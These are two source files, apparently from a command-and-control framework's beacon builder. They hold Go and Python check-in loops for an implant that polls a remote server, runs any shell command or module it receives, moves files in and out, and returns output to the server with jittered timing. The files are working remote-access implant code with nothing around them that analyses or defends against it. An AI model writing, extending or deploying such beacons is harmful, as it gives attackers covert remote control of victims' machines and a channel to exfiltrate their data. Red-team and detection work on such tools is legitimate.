File: beacon_builder/languages/go/core/checkin.go
// Check-in and command processing methods

func (b *GoBeacon) requestAction() (string, error) {
	message := fmt.Sprintf("request_action|%s", b.AgentID)
	return b.sendTCP(message, true)
}

func (b *GoBeacon) sendCommandOutput(output string) error {
	message := fmt.Sprintf("command_output|%s|%s", b.AgentID, output)
	_, err := b.sendTCP(message, false)
	return err
}

func (b *GoBeacon) processCommand(commandData string) {
	if commandData == "" || commandData == "No commands queued" || commandData == "no_pending_commands" {
		return
	}

	b.Logger.Printf("Processing command: %s", commandData)

	var output string

	if strings.HasPrefix(commandData, "execute_command|") {
		parts := strings.SplitN(commandData, "|", 2)
		if len(parts) >= 2 {
			command := parts[1]
			// Check for beacon shutdown command
			if command == "shutdown" {
				b.Logger.Println("Received shutdown command, stopping beacon...")
				b.IsRunning = false
				output = "Beacon shutting down"
			} else {
				output = b.executeCommand(command)
			}
		}
	} else if strings.HasPrefix(commandData, "execute_module|") {
		parts := strings.SplitN(commandData, "|", 3)
		if len(parts) >= 2 {
			module := parts[1]
			parameters := ""
			if len(parts) >= 3 {
				parameters = parts[2]
			}
			output = b.executeModule(module, parameters)
		}
	} else if strings.HasPrefix(commandData, "to_beacon|") {
		parts := strings.SplitN(commandData, "|", 2)
		if len(parts) >= 2 {
			output = b.downloadFile(parts[1])
		}
	} else if strings.HasPrefix(commandData, "from_beacon|") {
		parts := strings.SplitN(commandData, "|", 2)
		if len(parts) >= 2 {
			output = b.uploadFile(parts[1])
		}
	} else if commandData == "shutdown" {
		// Beacon shutdown command - stop the beacon loop
		b.Logger.Println("Received shutdown command, stopping beacon...")
		b.IsRunning = false
		output = "Beacon shutting down"
	} else {
		// Default: treat as shell command
		output = b.executeCommand(commandData)
	}

	if err := b.sendCommandOutput(output); err != nil {
		b.Logger.Printf("Error sending command output: %v", err)
	}
}

func (b *GoBeacon) Run() {
	b.Logger.Println("Starting Go beacon...")

	if err := b.register(); err != nil {
		b.Logger.Printf("Registration failed: %v", err)
		return
	}

	b.IsRunning = true
	b.Logger.Println("Registration successful, starting check-in loop...")

	for b.IsRunning {
		b.Logger.Printf("Checking in with server...")
		action, err := b.requestAction()
		if err != nil {
			b.Logger.Printf("Error requesting action: %v", err)
			time.Sleep(5 * time.Second)
			continue
		}

		if action == "" || action == "No commands queued" || action == "no_pending_commands" {
			b.Logger.Printf("No pending commands")
		} else if strings.HasPrefix(action, "ERROR") {
			b.Logger.Printf("Server returned error: %s", action)
		} else {
			b.Logger.Printf("Received command: %s", action)
			b.processCommand(action)
		}

		jitter := time.Duration(rand.Intn(5000)) * time.Millisecond
		sleepTime := b.CheckInterval + jitter
		b.Logger.Printf("Sleeping for %v before next check-in...", sleepTime)
		time.Sleep(sleepTime)
	}

	b.Logger.Println("Beacon stopped")
}

File: beacon_builder/languages/python/core/checkin.py
    # Check-in methods - Added to PythonBeacon class

    def request_action(self):
        """Request pending action from server"""
        message = f"request_action|{self.agent_id}"
        self.log(f"Requesting action: {message}")
        response = self.send_message(message)
        self.log(f"Action response: {response}")
        return response

    def send_checkin(self):
        """Send checkin heartbeat"""
        message = f"checkin|{self.agent_id}"
        response = self.send_message(message, expect_response=False)
        return response

    def send_command_output(self, output):
        """Send command output to server"""
        message = f"command_output|{self.agent_id}|{output}"
        response = self.send_message(message, expect_response=False)
        return response

    def process_command(self, command_data):
        """Process command from server"""
        try:
            # Check for standard "no command" responses from server
            no_command_responses = [
                "",
                "No commands queued",
                "no_pending_commands",
                "No pending commands"
            ]

            if not command_data or command_data in no_command_responses:
                return None

            self.log(f"Processing: {command_data}")

            # Parse command format: command_type|parameters
            if "|" in command_data:
                parts = command_data.split("|", 1)
                command_type = parts[0]
                parameters = parts[1] if len(parts) > 1 else ""

                # Dispatch to appropriate handler
                if command_type == "execute_command":
                    if hasattr(self, 'execute_command'):
                        output = self.execute_command(parameters)
                        self.send_command_output(output)
                elif command_type == "execute_module":
                    # Format: execute_module|module_name|parameters
                    module_parts = parameters.split("|", 1)
                    module_name = module_parts[0]
                    module_params = module_parts[1] if len(module_parts) > 1 else ""
                    self._execute_module(module_name, module_params)
                elif command_type == "download_file":
                    if hasattr(self, 'download_file'):
                        output = self.download_file(parameters)
                        self.send_command_output(output)
                elif command_type == "upload_file":
                    if hasattr(self, 'upload_file'):
                        output = self.upload_file(parameters)
                        self.send_command_output(output)
                else:
                    self.log(f"Unknown command type: {command_type}")
            else:
                # Simple command execution (backwards compatibility)
                if hasattr(self, 'execute_command'):
                    output = self.execute_command(command_data)
                    self.send_command_output(output)

        except Exception as e:
            self.log(f"Error processing command: {e}")
            self.send_command_output(f"ERROR: {e}")

    def _execute_module(self, module_name, parameters):
        """Execute a module by name - dispatcher for dynamic modules"""
        try:
            # Look for method matching module name
            method_name = module_name.replace("-", "_").lower()
            if hasattr(self, method_name):
                method = getattr(self, method_name)
                if parameters:
                    output = method(parameters)
                else:
                    output = method()
                self.send_command_output(output)
            else:
                self.log(f"Module not found: {module_name}")
                self.send_command_output(f"ERROR: Module '{module_name}' not available")
        except Exception as e:
            self.log(f"Error executing module {module_name}: {e}")
            self.send_command_output(f"ERROR: {e}")

    def run(self):
        """Main beacon loop"""
        self.log("Starting beacon...")

        # Initial registration
        self.register()
        self.is_running = True

        try:
            while self.is_running:
                try:
                    # Request action from server
                    self.log("Starting beacon cycle...")
                    action = self.request_action()

                    if action and not action.startswith("ERROR"):
                        self.process_command(action)
                    elif action and action.startswith("ERROR"):
                        self.log(f"Communication error: {action}")
                        self.log("Will retry in next cycle...")

                    # Wait before next cycle
                    self.log(f"Waiting {self.check_in_interval} seconds before next cycle...")
                    time.sleep(self.check_in_interval)

                except KeyboardInterrupt:
                    self.log("Beacon interrupted by user")
                    break
                except Exception as e:
                    self.log(f"Beacon error: {e}")
                    time.sleep(5)  # Wait before retry

        except Exception as e:
            self.log(f"Fatal beacon error: {e}")
        finally:
            self.is_running = False
            self.log("Beacon stopped")
